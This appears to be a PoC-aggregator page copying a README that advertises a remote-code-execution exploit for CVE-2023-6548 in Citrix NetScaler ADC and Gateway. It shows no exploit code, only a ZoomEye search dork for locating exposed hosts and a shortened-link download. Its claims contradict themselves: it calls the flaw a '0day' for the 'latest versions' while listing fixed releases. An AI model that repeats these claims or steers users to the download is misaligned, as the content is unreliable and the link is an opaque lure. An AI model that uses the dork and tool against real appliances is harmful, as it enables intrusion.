CVE-2023-6548 PoC — Citrix Systems ADC and NetScaler Gateway 代码注入漏洞

Source

Associated Vulnerability

Description

0day for Citrix Netscaler ADC and NetScaler Gateway latest versions

Readme

# CVE-2023-6548-POC
0day for Citrix Netscaler ADC and NetScaler Gateway latest versions

## 🔥 **CVSS: 10/10**

## Description
A vulnerability has been discovered in Citrix Gateway and Citrix ADC (formerly known as NetScaler ADC) that, if exploited, could lead to remote code execution on Management Interface.

## Exploit details
The exploit implements an improper code generation control vulnerability ("code injection") in NetScaler ADC and NetScaler Gateway and allows access (RCE) to an NSIP, CLIP, or SNIP with a management interface to perform authenticated (low-privilege) remote code execution on the management interface.


![image](https://github.com/Roonye660/CVE-2023-6548-POC/assets/162106909/5e46892a-1b70-4bbf-ad4f-b41595edf9ca)

## Zoomeye dork
```app:"Citrix NetScaler Gateway"```

## Vulnerable versions: 
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35<br>
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15<br>
NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21<br>
NetScaler ADC 13.1-FIPS before 13.1-37.176<br>
NetScaler ADC 12.1-FIPS before 12.1-55.302<br>
NetScaler ADC 12.1-NDcPP before 12.1-55.302<br>

## Download
[Download here](https://t.ly/vZp93)

## Date of published: 2024/03/04

## Contact
Author: Roonye660

For education purposes only.

File Snapshot

 [4.0K]  /data/pocs/ae7248dd2a3c218e79fb3e5d646c22273f892335
├── [4.4K]  CVE-2023-6548-RCE.py
└── [1.3K]  README.md

0 directories, 2 files

Remarks